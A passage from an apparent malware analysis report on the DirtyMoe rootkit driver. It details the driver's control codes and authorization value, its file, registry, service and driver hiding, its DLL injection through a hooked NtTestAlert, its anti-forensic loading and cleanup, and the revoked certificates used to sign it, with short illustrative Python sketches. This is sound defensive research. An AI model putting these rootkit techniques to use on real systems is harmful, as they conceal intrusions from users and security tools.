Further, the malware can use the driver to hide certain records, helping to mask its malicious activities. The driver affects the system registry and can conceal arbitrary keys. Moreover, the memory of the system process services.exe is patched so that the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which drivers are visible. Therefore, the malware is active, but the system and the user cannot list the malware's records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system, since the driver implements a minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed back to the user.

The driver implements 10 main functions, as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is a hook method that hides registry keys.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionality is available as public samples on internet forums. The level of programming skill differs between the individual functions, suggesting that the driver's author merged public samples in most cases. As a result, the driver contains a few bugs and some unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the offsets required for further malicious use. Secondly, it initializes the variable pointing to the driver image, which is later used for hiding the driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering FltPostOperation(); it filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors thread creation in the kernel, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.


There are 9 main control codes invoking driver functionality from user mode. The following Table 3 summarizes the controlling IOCTLs that can be sent by the malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in user mode can activate the driver by sending this IOCTL with an authorization code equal to 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds the driver's name to the listBaseDllName list and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004 The malware sends a process ID that it wants to terminate. The driver calls the kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of the malware's privileges.
0x2224C8 The malware sends data which the driver writes to the file defined by the filePath variable; see Setting control codes.
used variable: filePath, fileData
Table 3. Controlling IOCTLs

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists

The setting control codes store scalar values as global variables. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
Defines a file name and data for the first file written during the driver shutdown.
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Keeps a path and data for file A.
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requesting process is not present in the whitelists. There are two whitelists. The first ones (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or process image file name requesting the given I/O operation (QueryDirectory) is present in them. They represent malware processes that should have access to the file system without restriction. The second whitelist is called WinDeviceNumber and defines a set of suffixes. The FltPostOperation() iterates over each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. This ensures that the whitelisted files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from the malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the whitelist. It is double protection. The blacklist is focused on process image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Every registry key manipulation goes through the kernel method GetCellRoutine(), which the driver hooks. The configuration manager assigns a control block (CM_KEY_CONTROL_BLOCK) to each open registry key and keeps all control blocks in a hash table to quickly find existing ones. The GetCellRoutine() hook method computes the memory address of a requested key. Therefore, if the malware driver takes control of GetCellRoutine(), it can filter which registry keys are visible; more precisely, which keys can be found in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]. It simply walks the kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for the CM_KEY_CONTROL_BLOCK and its associated HHIVE structure corresponding to the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that the offsets of the looked-up structures, variables, and methods are specific to each Windows version or build. Therefore, the driver must determine which Windows version it runs on.

The MalGetCellRoutine() hook method performs 3 basic operations as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key that should be hidden, it returns the last registry key of the iterated HIVE instead. When the iteration reaches the end of the HIVE, the driver does not return the last key, since it was already returned, but NULL, which ends the HIVE search.

The consequence of this principle is that if the driver hides more than one key, it returns the last key of the searched HIVE multiple times. So, the final results of a registry query can contain duplicate keys.


The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated on Windows 10. The driver hides the requested key only for the regedit.exe application, and only if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. The routine registers a callback which is subsequently notified when a thread is created or deleted. The malicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and a Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e. only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly, in order to evade detection techniques, and instead obfuscates the lookup of each required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll.

The kernel methods are needed for a successful thread injection because the driver needs to read/write process data of an injected thread, including program instructions.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all looked-up methods are located consecutively after ZwAllocateVirtualMemory() in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions representing a constant move to eax (e.g. mov eax, ??h). These constants identify the VirtualMemory methods; see Table 7.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constant is found, the final address of the looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where the alignment_constant points back to the start of the looked-up method.

The steps to find the methods can be summarized as follows:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspicious in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on correct identification of the Windows version. We found one Windows 7 version for which the lookup returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), and ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting the NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets a pointer to the kernel structure PEB_LDR_DATA, which records the modules loaded in the process, including their PE headers and import tables. If an import table includes a required method, the driver extracts its base address, which is the entry point of the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread's APC queue. An APC (Asynchronous Procedure Call) is a technique to queue a job to be executed in the context of a specific thread, and it is called periodically. The driver rewrites the instructions of NtTestAlert() so that execution jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (the code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax, because the malicious code ends with a return instruction, so the original NtTestAlert() is then invoked. Finally, rdx contains the jump address where the driver injected the malicious code. The next item of the code cave is the path to the DLL file which shall be loaded into the injected process. The remaining items of the code cave are the original address and original code instructions of NtTestAlert().

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are overwritten with an instruction that simply jumps to the shellcode. Consequently, when NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.
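The hook-and-restore pattern described above can be modeled in a few lines. This is a conceptual sketch only: memory is a plain bytearray, the 12-byte x64 `mov rax, imm64; jmp rax` stub stands in for the real patch, and all offsets are arbitrary:

```python
# Conceptual sketch (not real shellcode). Hooking = save the first bytes of
# the target and overwrite them with a jump stub; unhooking = write the saved
# bytes back, as the malicious code does before returning into the original
# NtTestAlert().
JMP_STUB_LEN = 12  # x64 "mov rax, imm64; jmp rax" encodes to 12 bytes

def install_hook(mem, target_off, stub):
    saved = bytes(mem[target_off:target_off + len(stub)])
    mem[target_off:target_off + len(stub)] = stub
    return saved                        # kept in the code cave for restoration

def remove_hook(mem, target_off, saved):
    mem[target_off:target_off + len(saved)] = saved

memory = bytearray(range(64))           # fake code bytes
# 48 B8 <imm64>  = mov rax, imm64 ; FF E0 = jmp rax
stub = b"\x48\xB8" + (0x1000).to_bytes(8, "little") + b"\xFF\xE0"
assert len(stub) == JMP_STUB_LEN

saved = install_hook(memory, 16, stub)
assert memory[16:16 + JMP_STUB_LEN] == stub
remove_hook(memory, 16, saved)
assert memory == bytearray(range(64))   # original code fully restored
```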

Malicious Code x64

The malicious code for x64 is simple. First, it restores the original, overwritten instructions of NtTestAlert(). Second, it invokes the previously found LdrLoadDll() method and loads the appropriate DLL into the address space of the injected process. Finally, it executes a return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is essentially identical to the x64 version. However, the x86 malicious code needs to find the 32-bit variant of the LdrLoadDll() method. It uses a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Service Control Manager (SCM) to manage system services. The executable of the SCM is services.exe. This program runs at system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all running services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch a service record to hide the corresponding service. First, the driver must find the services.exe process and attach to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. services.exe keeps all running services as a linked list of SERVICE_RECORD structures [5]. The malware driver iterates this list and unlinks the services defined in the listServices whitelist; see Table 4.
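The unlinking itself is ordinary doubly-linked-list surgery. The toy model below (field and structure names are simplified; the real SERVICE_RECORD layout differs per Windows version) shows why an enumeration that walks the list never sees the hidden service:

```python
# Toy model of unlinking records from the SCM's linked service list.
class Record:
    def __init__(self, name):
        self.name, self.prev, self.next = name, None, None

def link(names):
    """Build a doubly linked list from service names; return its head."""
    head = prev = None
    for n in names:
        node = Record(n)
        if prev:
            prev.next, node.prev = node, prev
        else:
            head = node
        prev = node
    return head

def unlink_hidden(head, hidden):
    """Bypass every node whose name is in `hidden`, in both directions."""
    node = head
    while node:
        if node.name in hidden:
            if node.prev:
                node.prev.next = node.next
            else:
                head = node.next
            if node.next:
                node.next.prev = node.prev
        node = node.next
    return head

def enumerate_services(head):
    out, node = [], head
    while node:
        out.append(node.name)
        node = node.next
    return out

head = link(["Dhcp", "MsE3947328App", "Spooler"])
head = unlink_hidden(head, {"MsE3947328App"})
print(enumerate_services(head))         # ['Dhcp', 'Spooler']
```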

The byte sequence used for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence, {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D}, that is never used because it is bound to a Windows version that the malware driver never identifies; it may still be in development.
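A masked search like this, where ?? positions match any byte, can be sketched as follows (a pure-Python scan for illustration; the driver performs the equivalent over the attached process's memory):

```python
# Masked byte-pattern search; None positions (the ?? bytes) match anything.
def find_pattern(mem: bytes, pattern):
    plen = len(pattern)
    for i in range(len(mem) - plen + 1):
        if all(p is None or mem[i + j] == p for j, p in enumerate(pattern)):
            return i
    return -1

# {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D}, with ?? encoded as None
PATTERN = [0x48, 0x83, 0x3D, None, None, None, None, None, 0x48, 0x8D, 0x0D]

# Fabricated memory: two NOPs, then a matching sequence, then RET.
mem = bytes([0x90, 0x90,
             0x48, 0x83, 0x3D, 1, 2, 3, 4, 5, 0x48, 0x8D, 0x0D,
             0xC3])
print(find_pattern(mem, PATTERN))       # 2
```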

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services, and then compute the difference between the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on an IOCTL from user-mode. The Driver Entry routine receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called the driver section. The driver section points into a double-linked list of LDR_DATA_TABLE_ENTRY kernel structures representing all loaded drivers in the system; each entry stores information about a loaded driver, such as its base/entry point address, image name, image size, etc.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of LDR_DATA_TABLE_ENTRY structures. The malware driver iterates the whole list and unlinks the items (drivers) that should be hidden. The kernel thus loses the pointers to the hidden drivers and cannot enumerate them [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it appears to never be used in this version. The rest of the unload functionality executes the standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk, since the service always extracts, loads, and deletes the driver image on service startup. A secondary aim of the service is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service attempts to camouflage its registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain

3.1 Registry Operation

On startup, the service creates a registry record describing the malicious driver to load; see the following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, contrary to the common Windows naming convention. Moreover, an ImagePath prefixed with the dump_ string is normally used for virtual drivers (loaded only in memory) that manage the memory dump during a Windows crash. The malware mimics this virtual driver naming convention to be less conspicuous. The principle of memory dumping using virtual drivers is described in [7, 8].

The ImagePath value is different after each Windows reboot, but it always abuses the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

Once the driver load completes, whether successfully or not, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via API calls. However, forensic traces can still be found in the SYSTEM registry hive located at %SystemRoot%\system32\config\SYSTEM: the API call removes only the relevant hive pointer, while the unreferenced data remains present in the hive stored on disk. Hence, we can read the removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped driver file (with the dump_ prefix). We were not able to restore this file via tools for recovering deleted files, but we extracted it directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for loading the driver and cleaning up the loading evidence. We put a breakpoint on the nt!IopLoadDriver() kernel method, which is reached whenever a process wants to load a driver into the system. We waited for the wanted driver and then listed all system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading; we killed that service by modifying its EIP register. With the process (service) killed, the whole Windows system ended in a BSoD. Windows made a crash dump, so the file system caches were flushed, and the malicious service did not finish its cleanup in time. Therefore, we were able to mount the volume and read all the wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and the loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information, such as the ProcessID and ThreadID of all services, including the hidden ones.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with the dump_ prefix and thereby identify the malicious drivers.

An offline-connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require loaded drivers to be code-signed. The digital code signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the chain is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates, since this topic is quite broad; both backward compatibility and the potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates, as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-2011 (10:42:04)

The certificates have been revoked by their certification authorities and are registered as stolen, leaked, misused, etc. [10]. Although all the certificates were revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, its anti-forensic mechanisms, and the stolen certificates used for successful driver loading.

5.1 Main Functionality


Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in user-mode. However, the driver implements an authorization instrument which verifies that the IOCTLs are sent by authenticated processes. Therefore, not every process can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in effect, it filters the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access to the filesystem and what should be kept out of it.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked whenever the system creates a new thread. The malicious routine abuses the kernel APC mechanism to execute the malicious code, loading an arbitrary DLL into the new thread.

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in the hive. The code execution of the hook method is redirected to a malicious routine so that the driver can control the indexing of registry keys. In effect, the driver can select which keys are indexed and which are not.

Service and Driver Hiding

Patching specific kernel structures causes certain API functions not to enumerate all system services or loaded drivers. Windows services and drivers are stored as double-linked lists in the kernel. The driver corrupts these kernel structures so that malicious services and drivers are unlinked from them. Consequently, when the kernel iterates these structures for enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before the driver is loaded, the DirtyMoe service must register the driver in the registry and dump the driver into a file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver then deletes its own file from the file system from kernel-mode. Therefore, the driver is loaded in memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from physical storage, since the API calls only remove the pointers from the hive. The dumped driver file is never physically stored on the disk drive, because it is small enough to remain only in the cache memory. Accordingly, the file is removed from the cache before the cache is flushed to disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super-rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use a wide range of driver functionality. Since the authorization code is hardcoded and the driver’s name can be derived, we can hypothetically communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never physically present in the file system, only in the cache. The driver is loaded via an API call, and the DirtyMoe service keeps a handle to the driver file, so manipulation of the driver file is limited. However, the driver removes its own file using a kernel call. As a result, the driver file is removed from the file system cache while the driver handle remains valid, with the difference that the driver file no longer exists, including its forensic traces.

The DirtyMoe malware is mostly written in Delphi; the driver, naturally, is coded in native C. The code style of the driver and the rest of the malware is very different. Our analysis indicates that most of the driver’s functionality was taken from public samples posted on internet forums, and each part of the driver implementation is written in a different style. The malware authors merged individual rootkit functionalities into one kit, and they merged known bugs along with them, so the driver shows a few significant symptoms of its presence in the system. The authors needed to adapt the functionality of the public samples to their purposes, but this was done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signing certificates that are used were revoked in the middle of their validity periods. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates were issued by certification authorities that Microsoft trusts, so certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of such certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and evaluate its impact on infected systems. This study set out to investigate and present an analysis of the DirtyMoe driver, namely its functionality, its ability to conceal itself, its deployment, and its code signature.

The research has shown that the driver provides key functionality to hide malicious processes, services, and registry keys. Another dangerous capability of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements a minifilter which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and selected files/directories can be hidden from users. An implication of this finding is that the malware itself and its artifacts are hidden even from AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after the driver is loaded. Nevertheless, a few traces can still be found on a victim’s machine.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt down and investigate other samples that have been signed with the revoked certificates. In this way, the malware authors might be traced and identified through the abused certificates.


Samples (SHA-256)


[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
